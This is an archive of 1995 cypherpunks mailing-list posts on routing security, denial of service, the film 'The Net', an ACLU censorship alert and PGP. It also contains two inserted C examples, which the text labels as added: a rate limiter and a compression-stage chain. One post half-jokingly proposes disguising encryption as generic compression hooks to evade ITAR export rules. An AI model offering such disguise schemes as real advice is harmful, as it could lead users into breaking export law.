Subject: Re: Transport Layer Security (Was: Re: "Cypherpunks Write Code" as a Putdown)
In-Reply-To: <9508031243.AA18140@cs.umass.edu>
Message-ID: <199508031445.KAA08364@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



By the way, I'm very disappointed that this sort of topic doesn't come
up here more often. I perceive that it may be because lots of people
on this list are cyphergroupies and not actually tuned in to the
technical issues of securing every-day communication.

Futplex writes:
> Could someone say a bit more about the perceived difficulties associated
> with secure network routing protocols ?  TIA.
                                           ^^^^????

> I am not at all optimistic about defeating DoS attacks....

The people building the new routing protocols (BGP, OSPF, etc) have
included cryptographic security provisions in them that will work
regardless of whether IPSEC is available. Some of these have to be
hand configured but that's not actually a problem since peering in many
of these systems has to be hand configured in the first place. I had a
long talk with the Area Director for routing and such in the bar at
the last IETF meeting and he gave me the impression the routing people
are acutely aware of the problem and hope to assure that it disappears
with time.

Given cryptographic security on the routing packets, denial of service
attacks directed against routing become hard. Photuris has built in
protection against denial of service against it, by the way.

With luck, we will be down to dealing with very crude denial of
service attacks like packet flooding and hopefully we can come up with
reasonable mechanisms to stop them in the ordinary case.

Perry

PS Again, I strongly encourage people to get involved in the efforts
to secure the internet with IPSEC, MOSS and similar things. WE NEED YOU!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 3 Aug 95 07:53:05 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: NYET--attempted formal specs (again)
In-Reply-To: <ac45ab641b021004c902@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950803104530.165A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Aug 1995, Timothy C. May wrote:

> In fact, most religious groups are distrustful of "The Gubment" deciding
> what's reasonable and what's not.

Unless, of course, at that moment they happen to BE "The Gubment."

Not always then, but sometimes.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 3 Aug 95 08:06:35 PDT
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: "Codebreakers" on PBS in NYC????
In-Reply-To: <0au49c1w165w@bwalk.dm.com>
Message-ID: <Pine.BSD/.3.91.950803105116.12078B-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Dr. Dimitri Vulis wrote:

Anyone know if this will show up in NYC anytime?

> bart@netcom.com (Harry Bartholomew) writes:
> 
> >     For the Bay Area, on KQED at 8 p.m. Tuesday. The NOVA show
> >     "The World War II codebreaking efforts known as Enigma and Purple"
> 
> If this is the rerun of the show Nova had in march 94, then I highly
> recommend it.  I taped it and showed it to the undergrad class on computer
> security I taught that semester.  The kids loved it.

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ACLUNATL@aol.com
Date: Thu, 3 Aug 95 08:23:27 PDT
To: ACLUNATL@aol.com
Subject: ACLU Opposes Exon-Like Speech Crimes in Managers Amend. to House Telco Bill
Message-ID: <950803110530_47017838@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


**PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT UNTIL SATURDAY AUGUST 5, 1995**

8/2/95  
ACLU Cyber-Liberties Alert:  
Oppose Exon-Like Speech Crimes in the Managers Amendment to the House Telco
Bill  
----------------------------------------------------------------- 
The House is expected to begin considering the telecommunications bill (HR
1555) tonight, August 2, 1995, and to vote on the bill by Friday, August
5th.  The managers for the telco bill on the House floor -- Representatives
Bliley (R-VA), Hyde (R-IL), and Dingell (R-MI) will be introducing an
omnibus "Managers Amendment" to HR 1555. 
 
The Managers Amendment would create, among many other unrelated changes,
new Exon-like speech crimes that would censor the Internet. 
 
To prevent online censorship and preserve free speech and privacy rights on
the Internet, we urge you to voice your opposition to this dangerous
amendment.  
  
The Managers Amendment would add an entirely new Exon-like provision to the
existing federal obscenity laws.  The provision would make it a crime to
"intentionally communicate by computer ... to any person the communicator
believes has not attained the age of 18 years, any material that, in
context, depicts or describes, in terms patently offensive as measured by
contemporary community standards, sexual or excretory activities or
organs."  (18 U.S.C. 1465) 
  
This provision, like the Exon amendment passed by the Senate, would
effectively reduce all online content to that which is suitable only for
children.  It also raises the same questions about service provider
liability that were raised by the Exon amendment. 
 
The Managers Amendment would also make it a crime to "receive" material
from overseas "by computer," thereby subjecting both Internet users and
service providers to new prosecutions (18 U.S.C. 1462).   
In addition, these new provisions, like the Exon amendment, would cover
private e-mail.  
  
Finally, the criminal code changes in the Managers Amendment would reduce
all online speech to the obscenity standards of the most restrictive
community in the United States -- unless the courts clarified the relevant
"community standards" for cyberspace (and we're losing the cases in court
so far).   
 
If the House adopts the Managers Amendment, both the House and Senate
versions of the telco bill will include severe attacks on cyber-liberties.
This would make it difficult for the conference committee to avoid some
kind of severe online censorship provisions in the final version of the
telecommunications deregulation bill.  
  
The Cox/Wyden amendment, which has received widespread support, will be
offered as a separate amendment to HR 1555.  Cox/Wyden is far preferable in
approach to either the Exon amendment in the Senate telco bill or the
Exon-like speech crime provisions in the Managers Amendment to the House
telco bill. Cox/Wyden also prohibits FCC censorship of Internet speech. 
 
However, the ACLU remains concerned about certain ambiguities and some
genuine problems in the Cox/Wyden bill.  When Cox/Wyden is adopted by the
House, we will work with the conference committee to resolve these
concerns, but we are troubled that they have not been resolved up to now. 
Representative Cox has committed again to working out these problems.  We
hope this will prove successful.  
  
But an affirmative vote on Cox/Wyden will not stop online censorship,
especially if the Exon-like Managers Amendment is also approved by the
House!!  
  
**Please call your Representative today to express your opposition to the
speech crime provisions in the Managers Amendment to the telco bill (HR
1555).  Express your support for the approach of the Cox/Wyden amendment.**

In addition to lobbying on the telco bill, and to lobbying the Rules
Committee to prevent floor action on either the Exon amendment or the
Exon-like new speech crimes provisions, the ACLU delivered the following
letter to Republican members and some Democrats in the House of
Representatives today: 
  
------------------  
  
RE:  Important Statements by Conservatives and Others on Unconstitutional 
Provisions of Telecommunications Deregulation Legislation (H.R. 1555 in the
House)  
  
Dear Representative:  
  
On behalf of the American Civil Liberties Union, we are pleased to provide
the enclosed statements from The Wall Street Journal, the Cato Institute,
Speaker Newt Gingrich, the Center for Democracy and Technology and the
Interactive Working Group.  All address the importance of leaving American
citizens free to decide -- not have some government bureaucracy control --
what they wish to watch on television or access by computer. 
 
While we do not agree with everything in any one of these statements, we
hope that you will find them of assistance as the House considers
telecommunications legislation.  You will be asked to vote on House
amendments paralleling those so devastatingly critiqued in these materials.

We urge your attention to two amendments that we believe are clearly
unconstitutional.  
  
The first amendment (included as item #41 in the managers amendment) would,
similar to the now heavily discredited Exon amendment, unconstitutionally
interfere with the free market and free speech approach that has turned the
Internet into the incredible source of entrepreneurial promise and
educational impact it is today.  
  
Although the July 31st memorandum on the managers amendment claimed that
this provision "creates criminal liability for intentionally sending
obscenity over computers," the amendment in fact deals with more expression
than just obscenity as the Supreme Court has defined it.  Instead the
amendment mixes elements of both obscenity (which the Supreme Court has
said is not constitutionally protected) and indecency (which is First
Amendment-protected speech) and seeks to make it a Federal crime for anyone
to communicate such material to someone under 18.  This provision of the
managers amendment is clearly unconstitutional for all the reasons so
eloquently expressed in the enclosed materials.  It is also silly.  Does
the Congress of the United States really intend that the Federal criminal
justice system will be used to send two 17-year-olds to Federal prison for
five years because their online dating chatter took an overly salacious
turn?  
  
This provision is, further, profoundly unwise policy.  It is another
example of what, in the Senate/Exon context, the Wall Street Journal
referred to as the "ham-handed approach" or resorting to the
"big-bureaucracy method to solve problems."  More importantly, this
government-dictated control would interfere with the implementation of
parental control technologies (including those in use today; see the CDT
report) because software developers would wait to deploy their products
widely or develop improvements until the inevitable legal challenges to the
combined obscenity/indecency provision are finally resolved.  This Federal
criminal law approach would be another "constitutional glue factory" that,
for example, in telephones took a decade to untangle before that law could
take effect.  Meanwhile, consenting adults will have their own free speech
limited to "child-proof" e-mail, and parents will be deprived of meaningful
technology to control what their children access on the Internet.   
 
We urge you to vote against this Big Government, anti-private sector and
unconstitutional addition to the Federal criminal code by voting against
the managers amendment.  
  
We also ask that you oppose the so-called "V-chip" amendment proposed by
Representative Markey.  The "V-chip" amendment would also stifle other
approaches and actually serve to lessen, not increase, effective parental
control over what their children watch on television.  The Markey amendment
would operate to censor broadcast and cable television programs, putting
time slots or channels under the power of a Federal government ratings
authority.  Despite assertions to the contrary, the plain language of the
amendment requires the formation of such a Federal government authority, to
be established by the Federal Communications Commission as an advisory
committee to form rules to identify and rate programming.  The actual
censorship would be effectuated through the mandatory installation in
television sets of "V-chips."  
  
The ACLU opposes the "V-chip" amendment because it would install an
unconstitutional government-run system designed to censor First
Amendment-protected expression on television.  The amendment would have the
effect of actually usurping control from parents in favor of a government
approval panel.  Under this regime, when the "V-chip" is activated,
government-mandated technology would operate to block an entire television
program based on expression that a government rating authority -- rather
than the parents -- finds to be violent, sexual or otherwise inappropriate.
We urge you to vote against the Markey "V-chip" amendment.   
 
Once the free enterprise system has identified a market (e.g., for parental
control technologies), private sector development works much faster and
provides a greater range of choices than having a government bureaucracy
foist its choice for a "winning technology" on parents and other consumers.
The Markey "V-chip" amendment would strangle development of the new
technologies that will give parents much more precise control over what
their children watch.  The Coburn amendment, on the other hand, would
review and encourage this private sector development of parental control
technology for televisions, and we believe that it merits your support.  As
the Wall Street Journal concluded, "The more forward-moving solution is to
empower parents and encourage good corporate citizenship."   
 
We appreciate this opportunity to express our reasons for opposing both the
Markey "V-chip" amendment and these criminal code changes in the managers
amendment.  We hope you find the enclosed materials helpful as the House
considers telecommunications deregulation.   
 
Sincerely yours,  
  
Laura W. Murphy, Director  
Washington National Office  
  
Donald Haines  
Legislative Counsel 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 3 Aug 95 08:15:25 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: "The Net"
In-Reply-To: <ac45406918021004a6b0@[205.199.118.202]>
Message-ID: <Pine.BSD/.3.91.950803105229.12078D-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Aug 1995, Timothy C. May wrote:

> The portrayal of her job as a "beta tester," with a couple of Mac screens
> running and lots of MacTCP connections, was well done. In fact, maybe the
> most interesting look at computer screens I've seen. (But maybe I'm
> biased...)

Don't forget the Wolf 3D "beta" she removed the virus out of. :-)  She 
was actually using ResEdit in one of the scenezez, but don't know why 
they kept on flashing all those hex dump black screenz.  After all, all 
they had to do was install MacsBug on the machine and hit the 
programmer's switch...  instant way to show code, and would have been 
even more realistic... (though some would use McNosey or The Debugger 
instead.)

> The cheesy climax, involving a computer virus, was especially egregious.
> But tension has to be gotten somehow, I suppose, and most moviegoers will
> not be terribly excited by the "real stuff." All in all, some good tension.

Except for having the "ESC key" virus travel to the Dept. Of Justice 
mainframe from a Mac (I'd like to see a virus pull that one off!)  The 
rest was fairly believable to some extent.  The moral of 'The Net' was of 
course that you shouldn't trust your machine's security to some off the 
shelf package 'Gatekeeper.'  Trust only 'Cypherpunk' Brand Software ;-)

She made some very big mistakes in her actions.  First, there are such 
things as backups, she could have convinced her lawyer to go to the DMV 
and force them to restore her records from tape.   Her fingerprints and 
photograph would appear... or more than likely look her up in the paper 
files.  I'm sure she got her first license waay back before they stored 
graphics on machines from the timeframe of the movie, her age, etc.

Shouldn't have been too hard to pull that off.  It may be easy to modify 
a series of computers and alter all records with a full set of back 
doors, but you can't change backups that are in the vaults of a 
government agency that easily. :-)

> Ironically, I saw a second movie the same day..."Under Siege II." It had a
> lot of crypto, as well. Things like "Going secure" on cellphone
> conversations with the Arabs purchasing the terrorist actions.

Things are starting to look up for us if Joe Bloe sees these movies and 
learns about security and crypto -- even if it's by watching movies.

Don't forget in The Net, Angela used several cell phones which led 
straight to her even though they were stolen... and of course the bad guy 
was listening in on all her conversations. :-)

Also how did she get into the Moscone Convention Center without a badge; 
I didn't see her swipe one from someone... just snuck right in..

The thing that I liked most about this is the parallel between James 
Gregg and Bill Gates.  :-)  Not quite as obvious and forward as it should 
have been.  All Macs and no Windoze 95 screens anywhere!!!!  I think 
Bill is well pissed about that.





                                                                   =====
                                                                    ! !
                                                                    ! !


=================================================================93=======
 + ^ + |  Gate Keeper    | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |mozzart@ghost.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 3 Aug 95 08:10:59 PDT
To: cypherpunks@toad.com
Subject: Re: Transport Layer Security (Was: Re: "Cypherpunks Write Code" as a Putdown)
In-Reply-To: <9508031243.AA18140@cs.umass.edu>
Message-ID: <199508031510.LAA13014@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Perry writes:
> > I believe that between IPSP for the
> > links and MOSS (and SHTTP using MOSS for document security) we should
> > have the whole thing wrapped up in a couple of years. Problems still
> > to solve include security for the internet's routing protocols,
> > protection against denial of service attacks, etc.
> 
> Could someone say a bit more about the perceived difficulties associated
> with secure network routing protocols ?  TIA.
> 
> I am not at all optimistic about defeating DoS attacks....

  It seems to me that many of these attacks can be defeated by anti-spam
routines (with exponential time buildup) and economic mechanisms. That is,
you pay "credits", which can possibly be based on real money, for each
access. When you use them up, you must contact the service to request more.
Coupled with authentication, this makes DoS tough because you must request
more credits for your ID, however, if you use them up quicker than
average, you must justify why you need them again so soon.

  Anti-spam routines have been successful on IRC and MUDS against DoS. Each
"request" is measured against the time since the last request. If the time
is less than the delay, the request is denied (and with exponential
buildup, you double the delay so that even "needling" attacks where
a DoS attack finds your delay and transmits just under that, have trouble).
If the resource is disk space, or network memory buffers, or whatever, you
impose similar timing sensitive constraints.
 
  This covers most spam based DoS. 

-Ray
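
The delay-doubling throttle described in the message above, as an added
example that is not part of the original post or of any IRC or MUD code base.
The one-second base delay, the 64-second cap, the halving decay rule, the
client table and all function names are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>

#define BASE_DELAY_MS 1000L                  /* assumed minimum spacing between requests */
#define MAX_DELAY_MS  (64L * BASE_DELAY_MS)  /* assumed cap on the doubled penalty */
#define MAX_CLIENTS   8

struct throttle {
    char id[16];    /* authenticated client identity, up to 15 characters */
    long last_ms;   /* time of the client's previous request, served or denied */
    long delay_ms;  /* spacing currently demanded of this client */
    int  fresh;     /* 1 until the first request has been seen */
    int  used;
};

static struct throttle table[MAX_CLIENTS];

void throttle_reset(void) { memset(table, 0, sizeof table); }

/* Find a client's state, optionally creating it. NULL if absent or table full. */
static struct throttle *lookup(const char *id, int create)
{
    struct throttle *slot = NULL;
    for (int i = 0; i < MAX_CLIENTS; i++) {
        if (table[i].used && strcmp(table[i].id, id) == 0)
            return &table[i];
        if (!table[i].used && slot == NULL)
            slot = &table[i];
    }
    if (!create || slot == NULL)
        return NULL;
    snprintf(slot->id, sizeof slot->id, "%s", id);
    slot->delay_ms = BASE_DELAY_MS;
    slot->fresh = 1;
    slot->used = 1;
    return slot;
}

/* Returns 1 to serve the request, 0 to deny it. now_ms is a monotonic clock. */
int throttle_request(const char *id, long now_ms)
{
    struct throttle *t = lookup(id, 1);
    if (t == NULL)
        return 0;                   /* cannot track this client: deny */
    if (t->fresh) {
        t->fresh = 0;
        t->last_ms = now_ms;
        return 1;
    }
    long gap = now_ms - t->last_ms;
    t->last_ms = now_ms;            /* denied requests restart the wait as well */
    if (gap < t->delay_ms) {
        /* Too soon: deny and double the required spacing, up to the cap. */
        t->delay_ms = (t->delay_ms > MAX_DELAY_MS / 2) ? MAX_DELAY_MS
                                                       : t->delay_ms * 2;
        return 0;
    }
    /* Assumed decay rule: each well-spaced request halves the penalty. */
    if (t->delay_ms > BASE_DELAY_MS)
        t->delay_ms /= 2;
    return 1;
}

long current_delay(const char *id)
{
    struct throttle *t = lookup(id, 0);
    return t ? t->delay_ms : -1;
}

/* Replay n requests from one client at a fixed interval; count those served. */
int count_allowed(const char *id, long start_ms, long interval_ms, int n)
{
    int served = 0;
    for (int i = 0; i < n; i++)
        served += throttle_request(id, start_ms + (long)i * interval_ms);
    return served;
}

int main(void)
{
    throttle_reset();
    /* Constructed traffic: one client paces itself, one sends just under the delay. */
    int polite = count_allowed("polite", 0, 1500, 10);
    int needler = count_allowed("needler", 0, 900, 20);
    printf("polite  (1500 ms apart): %d of 10 served\n", polite);
    printf("needler ( 900 ms apart): %d of 20 served, delay now %ld ms\n",
           needler, current_delay("needler"));
    return 0;
}
```

Because state is kept per identity, the client that stays under the delay
raises only its own penalty; the paced client is served throughout.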



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 3 Aug 95 08:24:38 PDT
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: "The Net"
In-Reply-To: <H2H99c9w165w@bwalk.dm.com>
Message-ID: <Pine.BSD/.3.91.950803110646.12078E-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Aug 1995, Dr. Dimitri Vulis wrote:

> I saw it about 1/2 hour ago. I make a point of seeing every computer-related
> movie. I don't think real movie-goers would enjoy it much. It's cheap and
> unprofessional. Lots of running around, but no real car crashes. The acting is
> terrible. The star should NOT have appeared in a bikini. Yech.

Why not, she had the right 'assets' for that scene, no? 8-D

> They try to "explain this away" by saying that 1) she lived in the neighborhood
> for 4 years and never got to know any neighbors (as one of the neighbors tells
> the police), 2) her mother's got Alzheimers and doesn't recognize her anymore,
> 3) she telecommutes for a company in another city and only knows 2 people there
> in real life. One gets killed at the beginning; the other gets fired and she
> makes no attempt to find him (one of the many loose ends). The computer-related
> plot is just slightly more plausible.

Makes sense, too many geeks without a real-world-life out there.

> In a typical suspenseful scene (not a spoiler), the heroine sneaks into an
> office and sets off a fire alarm. Everyone leaves, including a villaine, who
> doesn't log off. The heroine receives a new e-mail addressed to the villaine,
> with the orders to kill the heroine (cleartext), signed 'pretorian'. The heroine
> types 'whois pretorian' and gets an IP address, but no name. The heroine goes
> through what looks like traceroute and obtains the pretorian's name and picture
> (but the viewers know his identity from the start, of course). She finishes
> saving it to a floppy disk moments before the villaine returns to the cubicle.
> 
> (One of the IP bytes was 344, by the way.)

The security was laughable.  But consider that most of corporate Amerika 
is this way.  Very few care about security.  Here at work I have to fight 
extra hard with idiots who log in and leave their machines -- users with 
Supervisory access!  All sorts of shit like that...

Re: ip #'s: Yeah, it's like all the phone numbers in every movie are 
555-xxxx.  Probably they didn't want to get sued by posting a real net 
address.

> Another time she types "telnet someone@somewhere.mil". Another time she
> "hot chats" on her Mac, and hooks up the text to a voice synthesizer.

That was after she got the milnet address though.  Nice email address that 
can be telnetted into.  But the voice synths are possible.  Apple does 
provide that capability.  You'd have to get the irc client to use it.  
Don't know of any that do off the top of my head but I haven't looked for 
it either.  It wasn't much of a "hot" chat.  It could have been much 
steamier.  The sex content of this movie was pretty lame though...

> (If they all exchange so much e-mail, why do they bother FedExing diskettes?)

More secure to fedex a disk.  Nobody on the net can read what's not on 
the net. ;-)  Now if the author of this movie knew about pgp... totally 
different story.

> Interestingly, there's NO mention of crypto. Once you know someone's password,
> or have physical access to the media, you can read and write everything. Once
> you change some data, it's changed. No digital signatures.

Yeah, that was quite bad.  

> In fact, the bad guys were selling everyone a computer security system called
> "the Gatekeeper" (a Trojan horse, really), but it's not identified as crypto.
> It sounded like access rights are checked by their server. It involves a Web
> page with a 'pi' symbol (pi stands for pretorian, of course). Clicking on the
> pi while pressing control-shift will display much hexadecimal stuff and then
> let the user in through a backdoor. Hmm. Gatekeeper = Bill Gates = Windows 95?
> Is that why Apple lent those Macs? :)

That was my impression too.

> There's a character named "CyberBob" who's never seen. He only hot-chats
> and eventually gets killed. His icon looks like MS Bob.

Yeah, death to MS-Bob...  >:-)

> I heard only one mention the "the Internet". At the end of the movie, a TV
> announcer says that the case was cracked because the "programmer analyst
> Angela Bennett e-mailed the evidence to the FBI from the Internet".
> (E-mailed from an open-access computer at a computer show, I might add)

Not unlikely.  A lot of trade shows do provide machines with net access 
as demos of the internet.  Though it's usually manned by the ISP and not 
out in the open.


=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 3 Aug 95 08:29:20 PDT
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: a hole in PGP
In-Reply-To: <199507312340.TAA02533@toxicwaste.media.mit.edu>
Message-ID: <Pine.BSD/.3.91.950803111851.12078F-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


Agreed.  If PGP has a hole in it, it's not in the sources, nor in the 
executables.  Any hole would be a breaking of the RSA or IDEA cyphers by 
the TLA's who wouldn't talk about it, or the availability of enough super 
fast hardware to brute force it.

It wouldn't be that PGP, its sources, or algorithms have holes.  It 
would be that there is a way to factor RSA that as of yet we don't know 
about.  And hell, that's as likely as meeting Elvis at your local 7-11. ;-)


=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 3 Aug 95 08:38:26 PDT
To: Andrew Spring <Andrew.Spring@ping.be>
Subject: Re: Australia next to ban PGP
In-Reply-To: <199508011940.VAA05285@ping1.ping.be>
Message-ID: <Pine.BSD/.3.91.950803112930.12078L-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


Does this have anything to do with the fact that there's an NSA base 
smack in the middle of Australia?  (See Puzzle Palace)

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 3 Aug 95 08:48:35 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: building libraries
In-Reply-To: <199507310521.WAA08413@ix4.ix.netcom.com>
Message-ID: <Pine.BSD/.3.91.950803113122.12078M-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 30 Jul 1995, Bill Stewart wrote:

> If you did everything in an RSAREF-compatible manner, that would help;
> I think somebody outside the US has written an RSAREF-clone.
> Some problems include building programs that have generic-callout hooks
> instead of crypto-specific hooks (so that they don't get bitten by ITAR),
> while still maintaining reasonable efficiency and convenience.

One way to achieve this is to provide multi-layered generic "compression" 
hooks which get called in this manner:

 Compress[x](char *bufferin, size_t insize, char *bufferout, size_t *osize);

Then you chain several of these by alternating the in/out buffers, say 
something like this:

 for (i=0; i<MAXCOMPRESSORS; i+=2)
 {
  Compress[i](buffer1,size1,buffer2,&size2);
  Compress[i+1](buffer2,size2,buffer1,&size1);
 }

To decompress, you'd do something like this:

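 /* compression left its final output in buffer1, so start from there */
 for (i=MAXCOMPRESSORS-2; i>=0; i-=2)   /* i is a signed int, MAXCOMPRESSORS even */
 {
  Decompress[i+1](buffer1,size1,buffer2,&size2);
  Decompress[i](buffer2,size2,buffer1,&size1);
 }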

This lets you set up a chain of compressors, each compressing the output 
of the previous levels.  And what you do is allow these compressors to be 
external to the program!  (If one or more of those should be hooks to 
encrypt, well, hey, that's just a 'bug' ;-)

Basically this does C1(C2(C3(C4...CN(text)))))...) to compress the output of 
the previous compressors.  I would recommend that the last in the set be 
the encryptors or else all the other compressors would fail. :-)

Now, would >THAT< be exportable?

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/
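
A runnable version of the stage chain from the message above, added here as
an illustration and not the poster's code; it also handles an odd number of
stages and shows why a stage that randomizes data has to run after the
compressors. rle_pack, mask and run_chain are hypothetical names, and mask is
a placeholder XOR stream, not a cipher.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUFSZ 512                 /* size of each working buffer */
typedef unsigned char byte;
/* One generic stage, shaped like the message's Compress[x] hook; returns 0 or -1. */
typedef int (*stage_fn)(const byte *in, size_t insize, byte *out, size_t *osize);

/* Run-length encoder: (count, byte) pairs with count in 1..255. */
static int rle_pack(const byte *in, size_t n, byte *out, size_t *on)
{
    size_t o = 0;
    for (size_t i = 0; i < n; ) {
        size_t run = 1;
        while (i + run < n && in[i + run] == in[i] && run < 255) run++;
        if (o + 2 > BUFSZ) return -1;
        out[o++] = (byte)run;
        out[o++] = in[i];
        i += run;
    }
    *on = o;
    return 0;
}

static int rle_unpack(const byte *in, size_t n, byte *out, size_t *on)
{
    size_t o = 0;
    if (n % 2 != 0) return -1;
    for (size_t i = 0; i < n; i += 2) {
        if (in[i] == 0 || o + in[i] > BUFSZ) return -1;
        memset(out + o, in[i + 1], in[i]);
        o += in[i];
    }
    *on = o;
    return 0;
}

/* Placeholder for the external hook: XOR with a fixed LCG byte stream.
   It is its own inverse and is NOT a cipher; it only makes data look random. */
static int mask(const byte *in, size_t n, byte *out, size_t *on)
{
    uint32_t s = 12345u;
    if (n > BUFSZ) return -1;
    for (size_t i = 0; i < n; i++) {
        s = s * 1103515245u + 12345u;
        out[i] = (byte)(in[i] ^ (s >> 16));
    }
    *on = n;
    return 0;
}

/* Apply stages[0..count-1] in order, alternating between two buffers. */
int run_chain(const stage_fn *stages, int count,
              const byte *in, size_t insize, byte *out, size_t *osize)
{
    byte a[BUFSZ], b[BUFSZ], *src = a, *dst = b, *tmp;
    size_t n = insize, m = 0;
    if (insize > BUFSZ) return -1;
    memcpy(src, in, insize);
    for (int i = 0; i < count; i++) {
        if (stages[i](src, n, dst, &m) != 0) return -1;
        tmp = src; src = dst; dst = tmp; n = m;   /* this output feeds the next stage */
    }
    memcpy(out, src, n);
    *osize = n;
    return 0;
}

static const stage_fn pack_then_mask[] = { rle_pack, mask };
static const stage_fn mask_then_pack[] = { mask, rle_pack };
static const stage_fn undo_pack_then_mask[] = { mask, rle_unpack };  /* inverses, reversed */
/* Constructed sample input: 120 'A' bytes followed by 80 'B' bytes. */
static void sample(byte text[200]) { memset(text, 'A', 120); memset(text + 120, 'B', 80); }

size_t chained_size(const stage_fn *stages, int count)
{
    byte text[200], out[BUFSZ];
    size_t n = 0;
    sample(text);
    return run_chain(stages, count, text, sizeof text, out, &n) == 0 ? n : 0;
}

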